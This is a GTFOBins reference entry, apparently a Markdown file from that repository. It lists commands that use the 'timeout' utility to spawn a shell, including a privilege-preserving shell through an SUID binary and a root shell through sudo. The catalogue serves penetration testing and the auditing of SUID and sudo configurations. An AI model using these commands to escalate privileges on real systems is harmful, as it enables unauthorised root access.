GTFOBins.github.io/_gtfobins/timeout.md
2018-07-04 19:26:52 +01:00

10 lines
186 B
Markdown

---
functions:
execute-interactive:
- code: timeout 7d /bin/sh
suid-enabled:
- code: "./timeout 7d /bin/sh -p"
sudo-enabled:
- code: sudo timeout --foreground 7d /bin/sh
---